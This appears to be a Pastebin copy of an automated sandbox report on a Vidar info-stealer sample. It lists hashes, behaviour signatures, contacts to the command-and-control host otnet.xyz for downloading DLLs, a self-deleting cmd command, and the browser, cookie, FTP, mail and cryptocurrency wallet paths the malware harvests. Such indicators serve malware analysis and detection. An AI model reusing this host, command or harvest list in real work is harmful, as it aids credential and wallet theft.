SHARE
TWEET

Vidar_a85132af1b5651472eb4ad093e1bb0f5_exe.txt

paladin316 Jul 22nd, 2019 (edited) 87 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. * MalFamily: "Vidar"
  2.  
  3. * MalScore: 10.0
  4.  
  5. * File Name: "Vidar_a85132af1b5651472eb4ad093e1bb0f5.exe"
  6. * File Size: 684032
  7. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  8. * SHA256: "012e9cbd15b3e19b703a118b0fb4c48df46a505416fb629b7764178f74cd8b53"
  9. * MD5: "a85132af1b5651472eb4ad093e1bb0f5"
  10. * SHA1: "280312657d13f403527b1b3cec7e577c1e5de64b"
  11. * SHA512: "1cbe8fd4394f72a0d4a904a06447ce07eb577d5d10adb44096e38bd5ab069d3752e3dba573f38512010a118df639cddcbb78231285f1c6f6dd14c1b0ccbe42df"
  12. * CRC32: "BFC0FAFA"
  13. * SSDEEP: "12288:TEtUmRfjBeCq3SkqTJ3N4FsOevUBPqt4Ma5DG2/dIM9hbU2nv68mKQO:YKEfjB1q3Sl0mOpBCtzYVl9hQWLdQO"
  14.  
  15. * Process Execution:
  16.     "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe",
  17.     "cmd.exe",
  18.     "taskkill.exe",
  19.     "services.exe",
  20.     "svchost.exe",
  21.     "WmiPrvSE.exe",
  22.     "taskhost.exe"
  23.  
  24.  
  25. * Executed Commands:
  26.     "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe & exit",
  27.     "C:\\Windows\\system32\\lsass.exe",
  28.     "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  29.     "taskkill  /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f"
  30.  
  31.  
  32. * Signatures Detected:
  33.    
  34.         "Description": "Creates RWX memory",
  35.         "Details":
  36.    
  37.    
  38.         "Description": "A process attempted to delay the analysis task.",
  39.         "Details":
  40.            
  41.                 "Process": "WmiPrvSE.exe tried to sleep 600 seconds, actually delayed analysis time by 0 seconds"
  42.            
  43.        
  44.    
  45.    
  46.         "Description": "A process created a hidden window",
  47.         "Details":
  48.            
  49.                 "Process": "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe -> C:\\Windows\\System32\\cmd.exe"
  50.            
  51.        
  52.    
  53.    
  54.         "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  55.         "Details":
  56.            
  57.                 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  58.            
  59.            
  60.                 "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  61.            
  62.            
  63.                 "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  64.            
  65.            
  66.                 "suspicious_request": "http://otnet.xyz/141"
  67.            
  68.            
  69.                 "suspicious_request": "http://otnet.xyz/freebl3.dll"
  70.            
  71.            
  72.                 "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  73.            
  74.            
  75.                 "suspicious_request": "http://otnet.xyz/mozglue.dll"
  76.            
  77.            
  78.                 "suspicious_request": "http://otnet.xyz/msvcp140.dll"
  79.            
  80.            
  81.                 "suspicious_request": "http://otnet.xyz/nss3.dll"
  82.            
  83.            
  84.                 "suspicious_request": "http://otnet.xyz/softokn3.dll"
  85.            
  86.            
  87.                 "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
  88.            
  89.            
  90.                 "suspicious_request": "http://ip-api.com/line/"
  91.            
  92.            
  93.                 "suspicious_request": "http://otnet.xyz/"
  94.            
  95.        
  96.    
  97.    
  98.         "Description": "Performs some HTTP requests",
  99.         "Details":
  100.            
  101.                 "url": "http://otnet.xyz/141"
  102.            
  103.            
  104.                 "url": "http://otnet.xyz/freebl3.dll"
  105.            
  106.            
  107.                 "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  108.            
  109.            
  110.                 "url": "http://otnet.xyz/mozglue.dll"
  111.            
  112.            
  113.                 "url": "http://otnet.xyz/msvcp140.dll"
  114.            
  115.            
  116.                 "url": "http://otnet.xyz/nss3.dll"
  117.            
  118.            
  119.                 "url": "http://otnet.xyz/softokn3.dll"
  120.            
  121.            
  122.                 "url": "http://otnet.xyz/vcruntime140.dll"
  123.            
  124.            
  125.                 "url": "http://ip-api.com/line/"
  126.            
  127.            
  128.                 "url": "http://otnet.xyz/"
  129.            
  130.        
  131.    
  132.    
  133.         "Description": "Deletes its original binary from disk",
  134.         "Details":
  135.    
  136.    
  137.         "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  138.         "Details":
  139.            
  140.                 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11879534 times"
  141.            
  142.        
  143.    
  144.    
  145.         "Description": "Steals private information from local Internet browsers",
  146.         "Details":
  147.            
  148.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt"
  149.            
  150.            
  151.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  152.            
  153.            
  154.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt"
  155.            
  156.            
  157.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt"
  158.            
  159.            
  160.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  161.            
  162.            
  163.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  164.            
  165.            
  166.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  167.            
  168.        
  169.    
  170.    
  171.         "Description": "Collects information about installed applications",
  172.         "Details":
  173.            
  174.                 "Program": "Google Update Helper"
  175.            
  176.            
  177.                 "Program": "Microsoft Excel MUI  2013"
  178.            
  179.            
  180.                 "Program": "Microsoft Outlook MUI  2013"
  181.            
  182.            
  183.            
  184.            
  185.                 "Program": "Google Chrome"
  186.            
  187.            
  188.                 "Program": "Adobe Flash Player 29 NPAPI"
  189.            
  190.            
  191.                 "Program": "Adobe Flash Player 29 ActiveX"
  192.            
  193.            
  194.                 "Program": "Microsoft DCF MUI  2013"
  195.            
  196.            
  197.                 "Program": "Microsoft Access MUI  2013"
  198.            
  199.            
  200.                 "Program": "Microsoft Office Proofing Tools 2013 - English"
  201.            
  202.            
  203.                 "Program": "Adobe Acrobat Reader DC"
  204.            
  205.            
  206.                 "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  207.            
  208.            
  209.                 "Program": "Microsoft Publisher MUI  2013"
  210.            
  211.            
  212.                 "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  213.            
  214.            
  215.                 "Program": "Microsoft Office Shared MUI  2013"
  216.            
  217.            
  218.                 "Program": "Microsoft Office OSM MUI  2013"
  219.            
  220.            
  221.                 "Program": "Microsoft InfoPath MUI  2013"
  222.            
  223.            
  224.                 "Program": "Microsoft Office Shared Setup Metadata MUI  2013"
  225.            
  226.            
  227.                 "Program": "Microsoft Word MUI  2013"
  228.            
  229.            
  230.                 "Program": "Microsoft Groove MUI  2013"
  231.            
  232.            
  233.            
  234.            
  235.                 "Program": "Microsoft Access Setup Metadata MUI  2013"
  236.            
  237.            
  238.                 "Program": "Microsoft Office OSM UX MUI  2013"
  239.            
  240.            
  241.                 "Program": "Java Auto Updater"
  242.            
  243.            
  244.                 "Program": "Microsoft PowerPoint MUI  2013"
  245.            
  246.            
  247.                 "Program": "Microsoft Office Professional Plus 2013"
  248.            
  249.            
  250.                 "Program": "Adobe Refresh Manager"
  251.            
  252.            
  253.                 "Program": "Microsoft Office Proofing  2013"
  254.            
  255.            
  256.                 "Program": "Microsoft Lync MUI  2013"
  257.            
  258.            
  259.            
  260.            
  261.                 "Program": "Microsoft OneNote MUI  2013"
  262.            
  263.        
  264.    
  265.    
  266.         "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  267.         "Details":
  268.    
  269.    
  270.         "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  271.         "Details":
  272.            
  273.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  274.            
  275.            
  276.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  277.            
  278.            
  279.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\*.*"
  280.            
  281.            
  282.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e"
  283.            
  284.            
  285.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\"
  286.            
  287.            
  288.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  289.            
  290.            
  291.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
  292.            
  293.            
  294.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\*.*"
  295.            
  296.            
  297.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  298.            
  299.            
  300.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\"
  301.            
  302.            
  303.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  304.            
  305.            
  306.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\*.*"
  307.            
  308.            
  309.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\"
  310.            
  311.            
  312.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\*.*"
  313.            
  314.            
  315.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  316.            
  317.            
  318.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  319.            
  320.            
  321.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  322.            
  323.            
  324.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\*.*"
  325.            
  326.            
  327.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\"
  328.            
  329.            
  330.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  331.            
  332.            
  333.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\"
  334.            
  335.            
  336.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  337.            
  338.            
  339.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\*.*"
  340.            
  341.            
  342.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  343.            
  344.            
  345.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  346.            
  347.            
  348.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\"
  349.            
  350.            
  351.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  352.            
  353.            
  354.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\*.*"
  355.            
  356.            
  357.                 "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  358.            
  359.            
  360.                 "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  361.            
  362.            
  363.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\"
  364.            
  365.            
  366.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\*.*"
  367.            
  368.            
  369.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  370.            
  371.            
  372.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\"
  373.            
  374.            
  375.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  376.            
  377.            
  378.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\*.*"
  379.            
  380.            
  381.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  382.            
  383.            
  384.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\*.*"
  385.            
  386.            
  387.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\"
  388.            
  389.            
  390.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  391.            
  392.            
  393.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\"
  394.            
  395.            
  396.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\*.*"
  397.            
  398.            
  399.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  400.            
  401.            
  402.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  403.            
  404.            
  405.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\"
  406.            
  407.            
  408.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  409.            
  410.            
  411.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\*.*"
  412.            
  413.            
  414.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  415.            
  416.            
  417.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  418.            
  419.            
  420.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  421.            
  422.            
  423.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\"
  424.            
  425.            
  426.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\*.*"
  427.            
  428.            
  429.                 "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  430.            
  431.            
  432.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\"
  433.            
  434.            
  435.                 "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  436.            
  437.            
  438.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\*.*"
  439.            
  440.            
  441.                 "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  442.            
  443.            
  444.                 "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  445.            
  446.            
  447.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\*.*"
  448.            
  449.            
  450.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\"
  451.            
  452.            
  453.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  454.            
  455.            
  456.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  457.            
  458.            
  459.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\*.*"
  460.            
  461.            
  462.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\"
  463.            
  464.            
  465.                 "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  466.            
  467.            
  468.                 "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
  469.            
  470.            
  471.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\"
  472.            
  473.            
  474.                 "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  475.            
  476.            
  477.                 "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  478.            
  479.            
  480.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\*.*"
  481.            
  482.            
  483.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  484.            
  485.            
  486.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\"
  487.            
  488.            
  489.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  490.            
  491.            
  492.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\*.*"
  493.            
  494.        
  495.    
  496.    
  497.         "Description": "Harvests credentials from local FTP client softwares",
  498.         "Details":
  499.            
  500.                 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  501.            
  502.        
  503.    
  504.    
  505.         "Description": "Harvests information related to installed instant messenger clients",
  506.         "Details":
  507.            
  508.                 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  509.            
  510.        
  511.    
  512.    
  513.         "Description": "Harvests information related to installed mail clients",
  514.         "Details":
  515.            
  516.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  517.            
  518.            
  519.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  520.            
  521.            
  522.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  523.            
  524.            
  525.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  526.            
  527.            
  528.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  529.            
  530.            
  531.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  532.            
  533.            
  534.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  535.            
  536.        
  537.    
  538.    
  539.         "Description": "Collects information to fingerprint the system",
  540.         "Details":
  541.    
  542.    
  543.         "Description": "Created network traffic indicative of malicious activity",
  544.         "Details":
  545.            
  546.                 "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  547.            
  548.        
  549.    
  550.  
  551.  
  552. * Started Service:
  553.     "VaultSvc"
  554.  
  555.  
  556. * Mutexes:
  557.     "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963"
  558.  
  559.  
  560. * Modified Files:
  561.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
  562.     "C:\\ProgramData\\freebl3.dll",
  563.     "C:\\ProgramData\\mozglue.dll",
  564.     "C:\\ProgramData\\msvcp140.dll",
  565.     "C:\\ProgramData\\nss3.dll",
  566.     "C:\\ProgramData\\softokn3.dll",
  567.     "C:\\ProgramData\\vcruntime140.dll",
  568.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\ld",
  569.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\historych",
  570.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
  571.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
  572.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\c",
  573.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
  574.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\wd",
  575.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
  576.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
  577.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy\\\\xea\\x9b\\xb0\\xce\\x90\\xeb\\x82\\xa8\\xc8\\xa7\\xef\\xba\\xa0\\xc8\\xbf\\xe9\\x93\\x90\\xc8\\xb8",
  578.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
  579.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
  580.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
  581.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
  582.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
  583.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
  584.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e",
  585.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum\\",
  586.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\",
  587.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC\\\r",
  588.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus\\",
  589.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash\\\r",
  590.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge\\",
  591.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash\\",
  592.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore\\",
  593.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\",
  594.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\",
  595.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\",
  596.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\",
  597.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\",
  598.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\",
  599.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\",
  600.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\",
  601.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD\\",
  602.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\",
  603.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin\\",
  604.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\",
  605.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\",
  606.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\",
  607.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\",
  608.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\",
  609.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\",
  610.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\",
  611.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX\\\r",
  612.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
  613.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
  614.     "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  615.     "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  616.  
  617.  
  618. * Deleted Files:
  619.     "C:\\ProgramData\\freebl3.dll",
  620.     "C:\\ProgramData\\mozglue.dll",
  621.     "C:\\ProgramData\\msvcp140.dll",
  622.     "C:\\ProgramData\\nss3.dll",
  623.     "C:\\ProgramData\\softokn3.dll",
  624.     "C:\\ProgramData\\vcruntime140.dll",
  625.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
  626.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill",
  627.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
  628.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC",
  629.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
  630.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
  631.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
  632.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies",
  633.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
  634.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
  635.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads",
  636.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
  637.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files",
  638.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
  639.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History",
  640.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
  641.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
  642.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
  643.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
